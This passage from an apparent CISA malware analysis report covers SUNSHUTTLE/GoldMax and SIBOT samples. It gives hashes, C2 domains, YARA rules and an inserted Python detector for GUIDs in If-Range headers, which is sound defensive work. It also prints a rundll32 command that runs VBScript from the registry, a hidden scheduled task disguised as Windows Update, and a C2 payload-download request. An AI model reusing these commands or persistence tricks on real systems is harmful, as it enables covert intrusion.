HjELmFxKJc=f27616f33730acfea04a05e53081d1ec; P5hCrabkKf=gZLXIeKI; iN678zYrXMJZ=i4zICToyI70Yeidf1f7rWjm5foKX2Usx; b7XCoFSvs1YRW=78\r\nReferer: www[.]facebook.com\r\nAccept-Encoding: gzip\r\nWhois\r\nDomain Name: REYWEB.COM\r\nRegistry Domain ID: 1620703932_DOMAIN_COM-VRSN\r\nRegistrar WHOIS Server: whois.namesilo.com\r\nRegistrar URL: http://www.namesilo.com\r\nUpdated Date: 2020-04-30T08:57:06Z\r\nCreation Date: 2010-10-16T18:54:19Z\r\nRegistry Expiry Date: 2021-10-16T18:54:19Z\r\nRegistrar: NameSilo, LLC\r\nRegistrar IANA ID: 1479\r\nRegistrar Abuse Contact Email: abuse@namesilo.com\r\nRegistrar Abuse Contact Phone: +1.4805240066\r\nDomain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited\r\nName Server: NS1.CP-19.WEBHOSTBOX.NET\r\nName Server: NS2.CP-19.WEBHOSTBOX.NET\r\nDNSSEC: unsigned\r\nURL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/\r\n\u003e\u003e\u003e Last update of whois database: 
2021-03-04T17:32:23Z \u003c\r\nRelationships\r\nreyweb.com Connected_From 94c58c7fb43153658eaa9409fc78d8741d3c388d3b8d4296361867fe45d5fa45\r\nDescription\r\n\"Lexicon.exe\" (b9a2c986b6ad1eb4cfb0303baede906936fe96396f3cf490b0984a4798d741d8) attempts to connect to this domain.\r\nec5f07c169267dec875fdd135c1d97186b494a6f1214fb6b40036fd4ce725def\r\nTags\r\ntrojan\r\nDetails\r\nName SchCachedSvc.exe\r\nSize 2037248 bytes\r\nType PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows\r\nMD5 3efff3415e878d8f23f3c51cf1acfd1b\r\nSHA1 81cbbd07e8cd7ac171590304946003f9c02f5164\r\nSHA256 ec5f07c169267dec875fdd135c1d97186b494a6f1214fb6b40036fd4ce725def\r\nSHA512 d15f14af7dbe77d956adb05b3d4d67b401cb068a31392c45f64b2fe5a213a6f60bce4656d49375443ef165e276ccb5e98ce0c45b16842c3b2\r\nssdeep 49152:AbHM13VNy7Pcp00wMpC7+UuqGkyH0NFcCFqko37hWq:AbHexxwMpC7+Uuf7yaES7hWq\r\nEntropy 7.874807\r\nAntivirus\r\nBitDefender Gen:Variant.Bulz.370300\r\nESET a variant of WinGo/Agent.AE trojan\r\nEmsisoft Gen:Variant.Bulz.370300 (B)\r\nIkarus Trojan.Win64.Rozena\r\nLavasoft Gen:Variant.Bulz.370300\r\nMicrosoft Security Essentials Trojan:Win64/GoldMax.A!dha\r\nSophos Mal/GoldMax-A\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 1969-12-31 19:00:00-05:00\r\nImport Hash e58ab46f2a279ded0846d81bf0fa21f7\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\nc48f92bd3dd2069ef2edcdb22bd65fa1 header 512 2.494140\r\nd41d8cd98f00b204e9800998ecf8427e UPX0 0 0.000000\r\n0aaa15e9aae3304d555536a90dab1223 UPX1 2036224 7.875386\r\n8b4f623319b09fd4b7d5fcdc5179f6ee UPX2 512 1.763456\r\nRelationships\r\nec5f07c169... 
Connected_To nikeoutletinc.org\r\nDescription\r\nThis file is a 64-bit Windows executable written in Golang (Go) and was identified as SUNSHUTTLE/Goldmax malware.\r\nOn execution, the behavior is nearly identical to bootcats.exe (4e8f24fb50a08c12636f3d50c94772f355d5229e58110cccb3b4835cb2371aec). It produced the same number of events, with only slight variation in the order of file names. It is likely another iteration of this sample.\r\nUpon execution, it drops the file “config.data.tmp” in the same directory the executable is running from. The sample's filename mimics the name of a benign Windows service executable. It initiates encrypted network traffic to “nikeoutletinc.org” using TLSv1.3 to create a secure connection with its C2. config.data.tmp is encrypted using a key unique to each sample, but based on previous reporting it is almost certainly a configuration file. If the file does not already exist in the same directory as the malware, it will be created at runtime.\r\nThe file is packed with UPX. 
Displayed below is a string of interest:\r\n--Begin string of interest--\r\nGo build ID: \"yytqyhV7XNSuSZRXAADu/FzAnsR7anW_XvSXcBCS2/4f91rfQD47Q6E02u8kC8/_t-YMsh7fECr1GVsP3F7x\"\r\nhxxps[:]//cdn.bootstrap.com/id (%v) \u003c= evictCount (%v)initSpan: unaligned lengthinvalid argument to Int31ninvalid argument to Int63ninvalid port %q after hostinvalid request descriptormalformed HTTP status codemalformed chunked encodingname not unique on network\r\n--End string of interest--\r\n4e8f24fb50a08c12636f3d50c94772f355d5229e58110cccb3b4835cb2371aec\r\nTags\r\nbackdoor, trojan\r\nDetails\r\nName bootcats.exe\r\nSize 5178368 bytes\r\nType PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows\r\nMD5 7f3a0c0a72b661ad8eaf579789530634\r\nSHA1 d11a1fa8811781ad17253d47f23044994f691739\r\nSHA256 4e8f24fb50a08c12636f3d50c94772f355d5229e58110cccb3b4835cb2371aec\r\nSHA512 fed911ea264ca3f69fd28b4ce808fc185732ad99bb4b5f9167103e76694d4306a5f3af1d1b9aca5074b2aa72b2ec4909495cb2a018c0f47515\r\nssdeep 49152:YQ4uataXvwDOvdk6NDv0U/u3BT1OZutqIpYFDkciESn1KNJQvJiLxETsL0qoIqxk:L5gOwOq6NYbSZutqIpYIcmvpw7+A\r\nEntropy 5.960173\r\nAntivirus\r\nBitDefender Gen:Variant.Bulz.370300\r\nClamAV Win.Malware.SUNSHUTTLE-9838970-0\r\nESET a variant of WinGo/Agent.AE trojan\r\nEmsisoft Gen:Variant.Bulz.370300 (B)\r\nIkarus Trojan.Crypter\r\nLavasoft Gen:Variant.Bulz.370300\r\nMicrosoft Security Essentials Trojan:Win64/GoldMax.A!dha\r\nSophos Mal/GoldMax-A\r\nSystweak trojan-backdoor.sunshuttle-r\r\nYARA Rules\r\nrule CISA_3P_10327841_02 : SOLARFLARE trojan\r\n{\r\n   meta:\r\n       Author = \"CISA Trusted Third Party\"\r\n       Incident = \"10327841.r1.v1\"\r\n       Date = \"2021-03-04\"\r\n       Actor = \"n/a\"\r\n       Category = \"Trojan\"\r\n       Family = \"SOLARFLARE\"\r\n       Description = \"Detects strings in WindowsDSVC_exe samples\"\r\n       MD5_1 = \"4de28110bfb88fdcdf4a0133e118d998\"\r\n      
 SHA256_1 = \"fa1959dd382ce868c975599c6c3cc536aa0073be44fc8a6571a20fb0c8bea836\"\r\n   strings:\r\n       $Go_Lang = \"Go build ID:\"\r\n       $main_func = \"main.main\"\r\n       $main_encrypt = \"main.encrypt\"\r\n       $main_MD5 = \"main.GetMD5Hash\"\r\n       $main_beacon = \"main.beaconing\"\r\n       $main_command = \"main.resolve_command\"\r\n       $main_key1 = \"main.request_session_key\"\r\n       $main_key2 = \"main.retrieve_session_key\"\r\n       $main_clean = \"main.clean_file\"\r\n       $main_wget = \"main.wget_file\"\r\n   condition:\r\n       (uint16(0) == 0x5A4D) and all of them\r\n}\r\nrule FireEye_21_00004531_01 : SUNSHUTTLE backdoor\r\n{\r\n   meta:\r\n       Author = \"FireEye\"\r\n       Date = \"2021-03-04\"\r\n       Last_Modified = \"20210305_1704\"\r\n       Actor = \"UNC2452\"\r\n       Category = \"Backdoor\"\r\n       Family = \"SUNSHUTTLE\"\r\n       Description = \"This rule detects strings found in SUNSHUTTLE\"\r\n       MD5_1 = \"9466c865f7498a35e4e1a8f48ef1dffd\"\r\n       SHA256_1 = \"b9a2c986b6ad1eb4cfb0303baede906936fe96396f3cf490b0984a4798d741d8\"\r\n   strings:\r\n       $s1 = \"main.request_session_key\"\r\n       $s2 = \"main.define_internal_settings\"\r\n       $s3 = \"main.send_file_part\"\r\n       $s4 = \"main.clean_file\"\r\n       $s5 = \"main.send_command_result\"\r\n       $s6 = \"main.retrieve_session_key\"\r\n       $s7 = \"main.save_internal_settings\"\r\n       $s8 = \"main.resolve_command\"\r\n       $s9 = \"main.write_file\"\r\n       $s10 = \"main.beaconing\"\r\n       $s11 = \"main.wget_file\"\r\n       $s12 = \"main.fileExists\"\r\n       $s13 = \"main.removeBase64Padding\"\r\n       $s14 = \"main.addBase64Padding\"\r\n       $s15 = \"main.delete_empty\"\r\n       $s16 = \"main.GetMD5Hash\"\r\n   condition:\r\n       filesize\u003c10MB and uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and (5 of them)\r\n}\r\nrule 
FireEye_21_00004531_02 : SUNSHUTTLE backdoor\r\n{\r\n   meta:\r\n       Author = \"FireEye\"\r\n       Date = \"2021-03-04\"\r\n       Last_Modified = \"20210305_1704\"\r\n       Actor = \"UNC2452\"\r\n       Category = \"Backdoor\"\r\n       Family = \"SUNSHUTTLE\"\r\n       Description = \"This rule detects strings found in SUNSHUTTLE\"\r\n       MD5_1 = \"9466c865f7498a35e4e1a8f48ef1dffd\"\r\n       SHA256_1 = \"b9a2c986b6ad1eb4cfb0303baede906936fe96396f3cf490b0984a4798d741d8\"\r\n   strings:\r\n       $s1 = \"LS0tLS1CRUdJTiBQUklWQVRFIEtFWS0tLS0tCk\"\r\n       $s2 = \"LS0tLS1FTkQgUFJJVkFURSBLRVktLS0tLQ\"\r\n       $s3 = \"Go build ID: \\\"\"\r\n   condition:\r\n       filesize\u003c10MB and uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and all of them\r\n}\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 1969-12-31 19:00:00-05:00\r\nImport Hash 91802a615b3a5c4bcc05bc5f66a5b219\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n7a1607fa13e952f0074d14da6640799e header 1536 1.254058\r\n82e920a576c08a7fff8d28fe7f3e93a4 .text 2402816 5.901993\r\n7c4531cb3e331f4a36a1ac2b77022169 .rdata 2511360 5.340532\r\n69aaf44b0f374f9e66eb65c779a77528 .data 260608 5.551012\r\nf981b67cbc5a081af39bedc1eb2fe60b .idata 1536 3.414430\r\n07b5472d347d42780469fb2654b7fc54 .symtab 512 0.020393\r\nRelationships\r\n4e8f24fb50... Connected_To megatoolkit.com\r\n4e8f24fb50... Dropped bc7a3b3cfae59f1bfbde57154cb1e7deebdcdf6277ac446919df07e3b8a6e4df\r\nDescription\r\nThis file is a 64-bit Windows executable written in Golang (Go) and was identified as SUNSHUTTLE/Goldmax malware. 
It is unique in that it does not appear to be packed, unlike other GoldMax samples, which were packed with UPX. It was observed beginning to beacon after remediation efforts began on the compromised network.\r\nUpon execution, it drops the file “runlog.dat.tmp” (bc7a3b3cfae59f1bfbde57154cb1e7deebdcdf6277ac446919df07e3b8a6e4df) in the same directory the executable is running from. The sample's filename mimics the name of a benign Windows service executable. It initiates encrypted network traffic to “megatoolkit.com” using TLSv1.3 to create a secure connection with its C2. Runlog.dat.tmp is encrypted using a key unique to each sample, but based on previous reporting it is almost certainly a configuration file. If the file does not already exist in the same directory as the malware, it will be created at runtime.\r\nmegatoolkit.com\r\nTags\r\ncommand-and-control\r\nURLs\r\nmegatoolkit.com/catalog/\r\nmegatoolkit.com/icon.ico\r\nmegatoolkit.com/icon.pngi19TotqC9iD8Y0B7jcGnpp5hYcyjg4cL\r\nWhois\r\nDomain Name: megatoolkit.com\r\nRegistry Domain ID: 2344043124_DOMAIN_COM-VRSN\r\nRegistrar WHOIS Server: whois.namesilo.com\r\nRegistrar URL: https://www.namesilo.com/\r\nUpdated Date: 2020-12-16T07:00:00Z\r\nCreation Date: 2018-12-17T07:00:00Z\r\nRegistrar Registration Expiration Date: 2022-12-17T07:00:00Z\r\nRegistrar: NameSilo, LLC\r\nRegistrar IANA ID: 1479\r\nRegistrar Abuse Contact Email: abuse@namesilo.com\r\nRegistrar Abuse Contact Phone: +1.4805240066\r\nDomain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited\r\nRegistry Registrant ID:\r\nRegistrant Name: Domain Administrator\r\nRegistrant Organization: See PrivacyGuardian.org\r\nRegistrant Street: 1928 E. Highland Ave. 
Ste F104 PMB# 255\r\nRegistrant City: Phoenix\r\nRegistrant State/Province: AZ\r\nRegistrant Postal Code: 85016\r\nRegistrant Country: US\r\nRegistrant Phone: +1.3478717726\r\nRegistrant Phone Ext:\r\nRegistrant Fax:\r\nRegistrant Fax Ext:\r\nRegistrant Email: pw-82f809367ca4aef6cfb7b46bcb7f880c@privacyguardian.org\r\nRegistry Admin ID:\r\nAdmin Name: Domain Administrator\r\nAdmin Organization: See PrivacyGuardian.org\r\nAdmin Street: 1928 E. Highland Ave. Ste F104 PMB# 255\r\nAdmin City: Phoenix\r\nAdmin State/Province: AZ\r\nAdmin Postal Code: 85016\r\nAdmin Country: US\r\nAdmin Phone: +1.3478717726\r\nAdmin Phone Ext:\r\nAdmin Fax:\r\nAdmin Fax Ext:\r\nAdmin Email: pw-82f809367ca4aef6cfb7b46bcb7f880c@privacyguardian.org\r\nRegistry Tech ID:\r\nTech Name: Domain Administrator\r\nTech Organization: See PrivacyGuardian.org\r\nTech Street: 1928 E. Highland Ave. Ste F104 PMB# 255\r\nTech City: Phoenix\r\nTech State/Province: AZ\r\nTech Postal Code: 85016\r\nTech Country: US\r\nTech Phone: +1.3478717726\r\nTech Phone Ext:\r\nTech Fax:\r\nTech Fax Ext:\r\nTech Email: pw-82f809367ca4aef6cfb7b46bcb7f880c@privacyguardian.org\r\nName Server: NS1.DNSOWL.COM\r\nName Server: NS2.DNSOWL.COM\r\nName Server: NS3.DNSOWL.COM\r\nDNSSEC: unsigned\r\nURL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/\r\nRelationships\r\nmegatoolkit.com Connected_From 4e8f24fb50a08c12636f3d50c94772f355d5229e58110cccb3b4835cb2371aec\r\nDescription\r\nbootcats.exe (4e8f24fb50a08c12636f3d50c94772f355d5229e58110cccb3b4835cb2371aec) attempts to connect to this domain.\r\nbc7a3b3cfae59f1bfbde57154cb1e7deebdcdf6277ac446919df07e3b8a6e4df\r\nDetails\r\nName runlog.dat.tmp\r\nSize 235 bytes\r\nType ASCII text, with no line terminators\r\nMD5 aaf144c8c647a0f7f807e203921dc244\r\nSHA1 510336020a32652cb65891ad9fde3b2a60f9a768\r\nSHA256 
bc7a3b3cfae59f1bfbde57154cb1e7deebdcdf6277ac446919df07e3b8a6e4df\r\nSHA512 6a861468536c83626a0636adc517a48e4a5a022fea6f1e28bde3a43b1121d5b98734533e2f8c1943d9c5e075597139cd34ae6f5e1f75f9981a\r\nssdeep 3:oc2XPd1k1NjViOUjQ3EGqqxBo2JsKGNoLYWBiUvxwy3zeaDKkUg+mTe8G9t4WrQ8:52fdWHj47sYqHls7Wra/kU5MeX0ST7v\r\nEntropy 5.800454\r\nAntivirus\r\nNo matches found.\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nRelationships\r\nbc7a3b3cfa... Dropped_By 4e8f24fb50a08c12636f3d50c94772f355d5229e58110cccb3b4835cb2371aec\r\nDescription\r\nThis file is a text file that was dropped by bootcats.exe. Runlog.dat.tmp is encrypted using a key unique to each sample, but based on previous reporting it is almost certainly a configuration file. If the file does not already exist in the same directory as the malware, it will be created at runtime.\r\n7e05ff08e32a64da75ec48b5e738181afb3e24a9f1da7f5514c5a11bb067cbfb\r\nTags\r\nbot, downloader, loader, trojan\r\nDetails\r\nName rundll32registry_createremoteregistry.vbs\r\nSize 26789 bytes\r\nType ASCII text, with very long lines, with CRLF line terminators\r\nMD5 4fd640185f229d0ef142899c54024615\r\nSHA1 3d3ccd9445aeb07499a91250686c84a737bfa013\r\nSHA256 7e05ff08e32a64da75ec48b5e738181afb3e24a9f1da7f5514c5a11bb067cbfb\r\nSHA512 44fb8d7c2e19c3d3f135583e818532ec2db42e0b9f548e38fd44939a574af123521051eadcecbcf70908383bb27f92c55b2a8bacf07995c5b9\r\nssdeep 384:zYxnffSvor4lD1ok0JQCnaUfDnFO1AnKAn/jUfFYtYEYBhj:46/ok09tUfFYtYEYBhj\r\nEntropy 3.305791\r\nAntivirus\r\nMicrosoft Security Essentials TrojanDownloader:VBS/Sibot.A!dha\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nDescription\r\nThis file is a VBScript that has been identified as a variant of MISPRINT/SIBOT malware designed to install an obfuscated second stage VBScript into the Windows registry keys below:\r\n--Begin registry keys--\r\nhKey = 
HKEY_LOCAL_MACHINE\r\nSubkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\sibot\"\r\nValueName = \"(Default)\"\r\nData =    \"obfuscated second stage VBScript\"\r\n--End registry keys--\r\nThe embedded VBScript is executed by \"rundll32registry_schtaskdaily.vbs\r\n(acc74c920d19ea0a5e6007f929ef30b079eb2836b5b28e5ffcc20e68fa707e66).\r\n\"Final_vbscript.vbs\" (a9037af30ff270901e9d5c2ee5ba41d547bc19c880f5cb27f50428f9715d318f) is the de-obfuscated\r\nVBScript.\r\nScreenshots\r\nFigure 2 - The content of the script used to install an obfuscated second stage VBScript malware into the Windows registry\r\nkeys.\r\nFigure 3 - The registry key value containing the obfuscated second stage VBscript.\r\nacc74c920d19ea0a5e6007f929ef30b079eb2836b5b28e5ffcc20e68fa707e66\r\nTags\r\nbottrojan\r\nDetails\r\nName rundll32registry_schtaskdaily.vbs\r\nSize 3409 bytes\r\nType ASCII text, with very long lines, with CRLF line terminators\r\nMD5 15b3856e59a242577d83275279ed70e0\r\nSHA1 65d3a466d65e6f7df813f83c25d828e04488a1c7\r\nSHA256 acc74c920d19ea0a5e6007f929ef30b079eb2836b5b28e5ffcc20e68fa707e66\r\nSHA512 714d76e8da8d9016ef7b7351d67dba0c7a24930bad52958b86a05ff878d6506edbed48076a6f245cff1eb670dd75b0c5d317717cd494b0a55\r\nssdeep 96:xCKjZrAuFT3M6tsKXbdUKrsGrkLgTe1HDM3wmD2GQ09LUF:rLFwNsseyvV058\r\nEntropy 5.608919\r\nAntivirus\r\nBitDefender Trojan.Agent.FEBT\r\nEmsisoft Trojan.Agent.FEBT (B)\r\nLavasoft Trojan.Agent.FEBT\r\nMicrosoft Security Essentials Trojan:VBS/Sibot.B!dha\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 30 of 44\n\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nDescription\r\nThis file is a VBscript that has been identified a variant of MISPRINT/SIBOT malware designed to create a schedule task\r\nservice that uses Microsoft HTML Application (MSHTA) to execute the obfuscated second stage VBScript\r\n(7e05ff08e32a64da75ec48b5e738181afb3e24a9f1da7f5514c5a11bb067cbfb) from the Windows registry 
key:\r\n\"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\sibot.\"\r\nDisplayed below is the schedule task service information:\r\n--Begin schedule task--\r\nName: \"WindowsUpdate\"    \r\nDescription: \"This boot task launches the SIH client to finish executing healing actions to fix the system components vital to\r\nautomatic updating of Windows and Microsoft software installed on the machine. It is enabled only when the daily SIH\r\nclient task fails to c\"\r\nArguments: \"vbscript:\\\"\\\\..\\\\mshtml,RunHTMLApplication\r\n\\\"+Execute(CreateObject(\\\"WScript.Shell\\\").RegRead(\\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\sibot\\\\\\\"))\r\n(window.close)\"\r\nPath: rundll32\r\n--End schedule task--\r\nIt runs the command below daily:\r\n--Begin command--\r\n\"rundll32 vbscript:\\\"\\\\..\\\\mshtml,RunHTMLApplication\r\n\\\"+Execute(CreateObject(\\\"WScript.Shell\\\").RegRead(\\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\sibot\\\\\\\"))\r\n(window.close)\"\r\n--End command--\r\nDisplayed below is the content of the script daily scheduled task Extensible Markup Language (XML) created at the time of\r\nanalysis:\r\n--Begin scheduled task XML--\r\n\u003c?xml version=\\\"1.0\\\" encoding=\\\"UTF-16\\\"?\u003e\\r\\n\r\n\u003cTask version=\\\"1.2\\\"\r\n   xmlns=\\\"hxxp[:]//schemas.microsoft.com/windows/2004/02/mit/task\\\"\u003e\\r\\n\r\n   \u003cRegistrationInfo\u003e\\r\\n    \r\n       \u003cDescription\u003eThis boot task launches the SIH client to finish executing healing actions to fix the system components\r\nvital to automatic updating of Windows and Microsoft software installed on the machine. 
It is enabled only when the daily\r\nSIH client task fails to c\u003c/Description\u003e\\r\\n\r\n   \u003c/RegistrationInfo\u003e\\r\\n\r\n   \u003cTriggers\u003e\\r\\n    \r\n       \u003cCalendarTrigger id=\\\"DailyTriggerId\\\"\u003e\\r\\n    \r\n           \u003cStartBoundary\u003e2021-03-12T18:27:56\u003c/StartBoundary\u003e\\r\\n    \r\n           \u003cExecutionTimeLimit\u003ePT10M\u003c/ExecutionTimeLimit\u003e\\r\\n    \r\n           \u003cEnabled\u003etrue\u003c/Enabled\u003e\\r\\n    \r\n           \u003cScheduleByDay\u003e\\r\\n        \r\n               \u003cDaysInterval\u003e1\u003c/DaysInterval\u003e\\r\\n    \r\n           \u003c/ScheduleByDay\u003e\\r\\n    \r\n       \u003c/CalendarTrigger\u003e\\r\\n\r\n   \u003c/Triggers\u003e\\r\\n\r\n   \u003cPrincipals\u003e\\r\\n    \r\n       \u003cPrincipal\u003e\\r\\n    \r\n           \u003cRunLevel\u003eHighestAvailable\u003c/RunLevel\u003e\\r\\n    \r\n       \u003c/Principal\u003e\\r\\n\r\n   \u003c/Principals\u003e\\r\\n\r\n   \u003cSettings\u003e\\r\\n    \r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 31 of 44\n\n\u003cMultipleInstancesPolicy\u003eIgnoreNew\u003c/MultipleInstancesPolicy\u003e\\r\\n    \r\n       \u003cDisallowStartIfOnBatteries\u003etrue\u003c/DisallowStartIfOnBatteries\u003e\\r\\n    \r\n       \u003cStopIfGoingOnBatteries\u003etrue\u003c/StopIfGoingOnBatteries\u003e\\r\\n    \r\n       \u003cAllowHardTerminate\u003etrue\u003c/AllowHardTerminate\u003e\\r\\n    \r\n       \u003cStartWhenAvailable\u003etrue\u003c/StartWhenAvailable\u003e\\r\\n    \r\n       \u003cRunOnlyIfNetworkAvailable\u003efalse\u003c/RunOnlyIfNetworkAvailable\u003e\\r\\n    \r\n       \u003cIdleSettings\u003e\\r\\n    \r\n           \u003cDuration\u003ePT10M\u003c/Duration\u003e\\r\\n    \r\n           \u003cWaitTimeout\u003ePT1H\u003c/WaitTimeout\u003e\\r\\n    \r\n           \u003cStopOnIdleEnd\u003etrue\u003c/StopOnIdleEnd\u003e\\r\\n    \r\n           
\u003cRestartOnIdle\u003efalse\u003c/RestartOnIdle\u003e\\r\\n    \r\n       \u003c/IdleSettings\u003e\\r\\n    \r\n       \u003cAllowStartOnDemand\u003etrue\u003c/AllowStartOnDemand\u003e\\r\\n    \r\n       \u003cEnabled\u003etrue\u003c/Enabled\u003e\\r\\n    \r\n       \u003cHidden\u003etrue\u003c/Hidden\u003e\\r\\n    \r\n       \u003cRunOnlyIfIdle\u003efalse\u003c/RunOnlyIfIdle\u003e\\r\\n    \r\n       \u003cWakeToRun\u003efalse\u003c/WakeToRun\u003e\\r\\n    \r\n       \u003cExecutionTimeLimit\u003ePT72H\u003c/ExecutionTimeLimit\u003e\\r\\n    \r\n       \u003cPriority\u003e7\u003c/Priority\u003e\\r\\n\r\n   \u003c/Settings\u003e\\r\\n\r\n   \u003cActions\u003e\\r\\n    \r\n       \u003cExec\u003e\\r\\n    \r\n           \u003cCommand\u003erundll32\u003c/Command\u003e\\r\\n    \r\n           \u003cArguments\u003evbscript:\\\"\\\\..\\\\mshtml,RunHTMLApplication\r\n\\\"+Execute(CreateObject(\\\"WScript.Shell\\\").RegRead(\\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\sibot\\\\\\\"))\r\n(window.close)\u003c/Arguments\u003e\\r\\n    \r\n       \u003c/Exec\u003e\\r\\n\r\n   \u003c/Actions\u003e\\r\\n\r\n\u003c/Task\u003e\"\r\n--End scheduled task XML--\r\nScreenshots\r\nFigure 4 - The content of the vbscript used to create the schedule task service.\r\n88cd1bc85e6a57fa254ede18f96566b33cee999c538902aefc5b819d71163d07\r\nTags\r\nbotdownloaderloadertrojan\r\nDetails\r\nName prnmngrz.vbs\r\nSize 13660 bytes\r\nType ASCII text, with very long lines, with CRLF line terminators\r\nMD5 9812bb73079a739b97f2c3927ad764ba\r\nSHA1 bec3f2a9496a0f11696debf267ba7caf1c81a9a7\r\nSHA256 88cd1bc85e6a57fa254ede18f96566b33cee999c538902aefc5b819d71163d07\r\nSHA512 c6ff6f40c13cd0d60576e06259579af8f087f1a1a0e70429c4ae40feb3156c626b1b43c1072bb7b693c55236d69f00bdefdd062f22b2bcaa9cc\r\nssdeep 192:bz7Zhi5jjOB5U1WTQ7dkGixbKOXUHiMLNYy+n8C:bZB8WqaaOXUHiMLNYrnp\r\nEntropy 4.988488\r\nAntivirus\r\nMicrosoft Security Essentials 
TrojanDownloader:VBS/Sibot.A!dha\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 32 of 44\n\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nRelationships\r\n88cd1bc85e... Connected_To eyetechltd.com\r\nDescription\r\nThis file contains the obfuscated VBScript and has been identified a variant of MISPRINT/SIBOT malware. When executed,\r\nit collects the connection Globally Unique Identifier (GUID) associated to the local area network (LAN) connection and the\r\naddress of a proxy if configured on the victim's system. It attempts to download a malicious payload from its C2 server\r\nusing the URI below:\r\n--Begin URI--\r\n\"hxxps[:]//www[.]eyetechltd.com/wp-content/themes/betheme/includes\"\r\n--End URI--\r\nThe HTTP request header contains the extracted connection GUID in the \"If-Range\" field.\r\nDisplayed below is the HTTP request used to download the payload from its C2 server:\r\n--Begin request--\r\nGET /wp-content/themes/betheme/includes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Language: en-us\r\nIf-Range: AACF144C-0770-4FE3-B92B-A4BE71D2F9B9\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/78.0.3904.108 Safari/537.36\r\nHost: www[.]eyetechltd.com\r\n--End request--\r\nThe payload was not available for analysis. 
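The If-Range value in the request above is a usable detection hook on its own: RFC 7233 defines If-Range as carrying either an entity-tag or an HTTP-date, so a bare GUID in that header is anomalous whatever the domain or User-Agent. The Python below is an added example and not part of the CISA report. It parses a raw HTTP request head and flags watched headers whose value is GUID-shaped; the request from the report and a constructed benign range-resume request are embedded as sample input, and the function names (parse_request, find_guid_headers) and the watched-header tuple are this example's own.

```python
"""Flag HTTP requests whose If-Range header carries a GUID.
Added example; not part of the CISA report."""
import re
from typing import Dict, List, Sequence, Tuple

# RFC 7233: If-Range holds an entity-tag ("..." or W/"...") or an HTTP-date.
# A GUID, braced or bare, is neither, so its presence is the anomaly to alert on.
GUID_RE = re.compile(
    r"^\{?[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}\}?$"
)
# Header names inspected (lower-case). If-Range is the field the report documents;
# the tuple is a parameter so further names can be watched without code changes.
DEFAULT_HEADERS: Sequence[str] = ("if-range",)


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Split a raw HTTP/1.1 request head into (method, target, headers).
    Header names are lower-cased; a line starting with whitespace is treated
    as an obsolete folded continuation of the previous header."""
    lines = raw.replace("\r\n", "\n").strip("\n").split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    last = ""
    for line in lines[1:]:
        if not line.strip():
            break  # end of the head; a body (if any) follows
        if line[0] in " \t" and last:
            headers[last] += " " + line.strip()
            continue
        name, _, value = line.partition(":")
        last = name.strip().lower()
        headers[last] = value.strip()
    return method, target, headers


def find_guid_headers(raw: str, header_names: Sequence[str] = DEFAULT_HEADERS) -> List[Tuple[str, str]]:
    """Return (header, value) pairs where a watched header carries a GUID."""
    _method, _target, headers = parse_request(raw)
    return [(n, headers[n]) for n in header_names if n in headers and GUID_RE.match(headers[n])]


# Request captured in the report (prnmngrz.vbs), with the User-Agent on one line;
# the host is left in the report's defanged form.
SIBOT_REQUEST = (
    "GET /wp-content/themes/betheme/includes HTTP/1.1\r\n"
    "Connection: Keep-Alive\r\n"
    "Accept: */*\r\n"
    "Accept-Language: en-us\r\n"
    "If-Range: AACF144C-0770-4FE3-B92B-A4BE71D2F9B9\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36\r\n"
    "Host: www[.]eyetechltd.com\r\n"
    "\r\n"
)

# Constructed benign request: a download resumed with a proper entity-tag validator.
BENIGN_REQUEST = (
    "GET /downloads/update.cab HTTP/1.1\r\n"
    "Host: example.com\r\n"
    "Range: bytes=1024-\r\n"
    'If-Range: "5e2a7c1f-3bd"\r\n'
    "\r\n"
)

if __name__ == "__main__":
    for label, req in (("report sample", SIBOT_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, find_guid_headers(req))
```

The same check applies to proxy or web-server logs that record request headers: run find_guid_headers over each reconstructed request head, or translate GUID_RE into the log platform's own regex syntax against the If-Range field.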
Analysis indicates that the downloaded payload (a DLL) will be installed to "c:\windows\system32\drivers\mshidkmdfc.sys" and executed with the command below:
--Begin command--
"rundll32 mshidkmdfc.sys,Control_DllRun"
--End command--
Displayed below are sample de-obfuscated strings from the script:
--Begin strings--
"USER-AGENT"
